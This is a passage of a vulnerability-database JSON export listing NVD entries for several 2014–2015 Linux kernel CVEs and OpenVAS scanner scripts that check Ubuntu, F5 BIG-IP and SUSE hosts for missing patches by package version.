crafted application that reads a TLS base address.", "edition": 6, "cvss3": {}, "published": "2014-12-26T00:59:00", "title": "CVE-2014-9419", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9419"], "modified": "2018-01-05T02:29:00", "cpe": ["cpe:/o:linux:linux_kernel:3.18.1"], "id": "CVE-2014-9419", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9419", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file, which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call, as demonstrated by use of a file descriptor associated with an ext4 filesystem.", "edition": 6, "cvss3": {}, "published": "2015-03-16T10:59:00", "title": "CVE-2014-7822", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7822"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:linux:linux_kernel:3.15.8"], "id": "CVE-2014-7822", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7822", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": 
["cpe:2.3:o:linux:linux_kernel:3.15.8:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:21", "description": "Use-after-free vulnerability in the sctp_assoc_update function in net/sctp/associola.c in the Linux kernel before 3.18.8 allows remote attackers to cause a denial of service (slab corruption and panic) or possibly have unspecified other impact by triggering an INIT collision that leads to improper handling of shared-key data.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "edition": 6, "cvss3": {}, "published": "2015-03-16T10:59:00", "title": "CVE-2015-1421", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1421"], "modified": "2018-01-05T02:29:00", "cpe": ["cpe:/o:linux:linux_kernel:3.18.7"], "id": "CVE-2015-1421", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1421", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.7:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:36:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7822", "CVE-2015-1421", "CVE-2014-9683", "CVE-2014-9419"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2015-03-25T00:00:00", "id": "OPENVAS:1361412562310842146", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842146", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-2542-1", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-ti-omap4 USN-2542-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842146\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-25 06:33:39 +0100 (Wed, 25 Mar 2015)\");\n script_cve_id(\"CVE-2014-7822\", \"CVE-2014-9419\", \"CVE-2014-9683\", \"CVE-2015-1421\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-2542-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", 
value:\"The Linux kernel's splice system call did\nnot correctly validate its parameters. A local, unprivileged user could exploit\nthis flaw to cause a denial of service (system crash). (CVE-2014-7822)\n\nA flaw was discovered in how Thread Local Storage (TLS) is handled by the\ntask switching function in the Linux kernel for x86_64 based machines. A\nlocal user could exploit this flaw to bypass the Address Space Layout\nRadomization (ASLR) protection mechanism. (CVE-2014-9419)\n\nDmitry Chernenkov discovered a buffer overflow in eCryptfs' encrypted file\nname decoding. A local unprivileged user could exploit this flaw to cause a\ndenial of service (system crash) or potentially gain administrative\nprivileges. (CVE-2014-9683)\n\nSun Baoliang discovered a use after free flaw in the Linux kernel's SCTP\n(Stream Control Transmission Protocol) subsystem during INIT collisions. A\nremote attacker could exploit this flaw to cause a denial of service\n(system crash) or potentially escalate their privileges on the system.\n(CVE-2015-1421)\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2542-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2542-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-1461-omap4\", 
ver:\"3.2.0-1461.81\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7822", "CVE-2015-1421", "CVE-2014-9683", "CVE-2014-9419"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2015-03-25T00:00:00", "id": "OPENVAS:1361412562310842144", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842144", "type": "openvas", "title": "Ubuntu Update for linux USN-2541-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-2541-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842144\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-25 06:33:07 +0100 (Wed, 25 Mar 2015)\");\n script_cve_id(\"CVE-2014-7822\", \"CVE-2014-9419\", \"CVE-2014-9683\", \"CVE-2015-1421\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-2541-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Linux kernel's splice system call did\nnot correctly validate its parameters. A local, unprivileged user could exploit\nthis flaw to cause a denial of service (system crash). (CVE-2014-7822)\n\nA flaw was discovered in how Thread Local Storage (TLS) is handled by the\ntask switching function in the Linux kernel for x86_64 based machines. A\nlocal user could exploit this flaw to bypass the Address Space Layout\nRadomization (ASLR) protection mechanism. (CVE-2014-9419)\n\nDmitry Chernenkov discovered a buffer overflow in eCryptfs' encrypted file\nname decoding. A local unprivileged user could exploit this flaw to cause a\ndenial of service (system crash) or potentially gain administrative\nprivileges. 
(CVE-2014-9683)\n\nSun Baoliang discovered a use after free flaw in the Linux kernel's SCTP\n(Stream Control Transmission Protocol) subsystem during INIT collisions. A\nremote attacker could exploit this flaw to cause a denial of service\n(system crash) or potentially escalate their privileges on the system.\n(CVE-2015-1421)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2541-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2541-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-79-generic\", ver:\"3.2.0-79.115\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-79-generic-pae\", ver:\"3.2.0-79.115\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-79-highbank\", ver:\"3.2.0-79.115\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-79-omap\", ver:\"3.2.0-79.115\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-79-powerpc-smp\", ver:\"3.2.0-79.115\", rls:\"UBUNTU12.04 LTS\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-79-powerpc64-smp\", ver:\"3.2.0-79.115\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-79-virtual\", ver:\"3.2.0-79.115\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-07T18:45:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9419"], "description": "The remote host is missing a security patch.", "modified": "2020-04-03T00:00:00", "published": "2015-11-09T00:00:00", "id": "OPENVAS:1361412562310105439", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105439", "type": "openvas", "title": "F5 BIG-IP - SOL17551 - Linux kernel vulnerability CVE-2014-9419", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - SOL17551 - Linux kernel vulnerability CVE-2014-9419\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105439\");\n script_cve_id(\"CVE-2014-9419\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - SOL17551 - Linux kernel vulnerability CVE-2014-9419\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/kb/en-us/solutions/public/17000/500/sol17551.html\");\n\n script_tag(name:\"impact\", value:\"A local authenticated attacker may obtain sensitive information from kernel memory by using a specially crafted application.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The __switch_to function in arch/x86/kernel/process_64.c in the Linux kernel through 3.18.1 does not ensure that Thread Local Storage (TLS) descriptors are loaded before proceeding with other steps, which makes it easier for local users to bypass the ASLR protection mechanism via a crafted application that reads a TLS base address. 
(CVE-2014-9419)\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing a security patch.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-11-09 10:38:23 +0100 (Mon, 09 Nov 2015)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '11.4.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '11.3.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '11.0.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['APM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['LC'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '11.3.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, 
{"lastseen": "2020-04-07T18:45:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1421"], "description": "The remote host is missing a security patch.", "modified": "2020-04-03T00:00:00", "published": "2015-09-18T00:00:00", "id": "OPENVAS:1361412562310105356", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105356", "type": "openvas", "title": "F5 BIG-IP - SOL17242 - Linux kernel SCTP vulnerability CVE-2015-1421", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - SOL17242 - Linux kernel SCTP vulnerability CVE-2015-1421\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105356\");\n script_cve_id(\"CVE-2015-1421\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - SOL17242 - Linux kernel SCTP vulnerability CVE-2015-1421\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17242.html?sr=48315147\");\n\n script_tag(name:\"impact\", value:\"Remote attackers may be able to cause a denial-of-service (DoS) attack on an affected system by triggering an INIT collision in the Stream Control Transmission Protocol (SCTP). This vulnerability does not affect SCTP functionality on the data plane, but does affect the SCTP kernel module on the control plane for BIG-IP, BIG-IQ, and Enterprise Manager systems.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Use-after-free vulnerability in the sctp_assoc_update function in net/sctp/associola.c in the Linux kernel before 3.18.8 allows remote attackers to cause a denial of service (slab corruption and panic) or possibly have unspecified other impact by triggering an INIT collision that leads to improper handling of shared-key data. 
(CVE-2015-1421)\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing a security patch.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-09-18 14:09:09 +0200 (Fri, 18 Sep 2015)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '11.4.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '11.3.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '11.0.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['APM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['LC'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '11.3.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2020-01-31T18:38:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4692", "CVE-2015-5364", "CVE-2014-9728", "CVE-2014-9730", "CVE-2015-5366", "CVE-2014-9729", "CVE-2015-3212", "CVE-2015-4167", "CVE-2014-9731", "CVE-2015-4036", "CVE-2015-1805"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851080", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851080", "type": "openvas", "title": "SUSE: Security Advisory for kernel (SUSE-SU-2015:1324-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851080\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 19:38:43 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-9728\", \"CVE-2014-9729\", \"CVE-2014-9730\", \"CVE-2014-9731\", \"CVE-2015-1805\", \"CVE-2015-3212\", \"CVE-2015-4036\", \"CVE-2015-4167\", \"CVE-2015-4692\", \"CVE-2015-5364\", \"CVE-2015-5366\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for kernel (SUSE-SU-2015:1324-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SUSE Linux Enterprise 12 kernel was updated to 3.12.44 to receive\n various security and bugfixes.\n\n These features were added:\n\n - mpt2sas: Added Reply Descriptor Post Queue (RDPQ) Array support\n (bsc#854824).\n\n - mpt3sas: Bump mpt3sas driver version to 04.100.00.00 (bsc#854817).\n\n The following security bugs were fixed:\n\n - CVE-2015-1805: iov overrun for failed atomic copy could have lead to DoS\n or privilege escalation (bsc#933429).\n\n - CVE-2015-3212: A race condition in the way the Linux kernel handled\n lists of associations in SCTP sockets could have lead to list corruption\n and kernel panics 
(bsc#936502).\n\n - CVE-2015-4036: DoS via memory corruption in vhost/scsi driver\n (bsc#931988).\n\n - CVE-2015-4167: Linux kernel built with the UDF file\n system(CONFIG_UDF_FS) support was vulnerable to a crash. It occurred\n while fetching inode information from a corrupted/malicious udf file\n system image (bsc#933907).\n\n - CVE-2015-4692: DoS via NULL pointer dereference in kvm_apic_has_events\n function (bsc#935542).\n\n - CVE-2015-5364: Remote DoS via flood of UDP packets with invalid\n checksums (bsc#936831).\n\n - CVE-2015-5366: Remote DoS of EPOLLET epoll applications via flood of UDP\n packets with invalid checksums (bsc#936831).\n\n Security issues already fixed in the previous update but not referenced by\n CVE:\n\n - CVE-2014-9728: Kernel built with the UDF file system(CONFIG_UDF_FS)\n support were vulnerable to a crash (bsc#933904).\n\n - CVE-2014-9729: Kernel built with the UDF file system(CONFIG_UDF_FS)\n support were vulnerable to a crash (bsc#933904).\n\n - CVE-2014-9730: Kernel built with the UDF file system(CONFIG_UDF_FS)\n support were vulnerable to a crash (bsc#933904).\n\n - CVE-2014-9731: Kernel built with the UDF file system(CONFIG_UDF_FS)\n support were vulnerable to information leakage (bsc#933896).\n\n The following non-security bugs were fixed:\n\n - ALSA: hda - add codec ID for Skylake display audio codec (bsc#936556).\n\n - ALSA: hda/hdmi - apply Haswell fix-ups to Skylake display codec\n (bsc#936556).\n\n - ALSA: hda_controller: Separate stream_tag for input and output streams\n (bsc#936556).\n\n - ALSA: hda_intel: add AZX_DCAPS_I915_POWERWELL for SKL and BSW\n (bsc#936556).\n\n - ALSA: hda_intel: apply the Separate stream_tag for Skylake (bsc#936556).\n\n - ALSA: hda_intel: apply the Separate stream_tag for Sunrise Point\n (bsc#936556).\n\n - Btrfs: Handle unaligned length in extent_same (bsc#937609).\n\n - Btrfs: add missing inode item update in fallocate() (bsc#938023).\n\n - Btrfs: check pending chunks when shrinking fs to 
avoid corruption\n ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"kernel on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:1324-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = 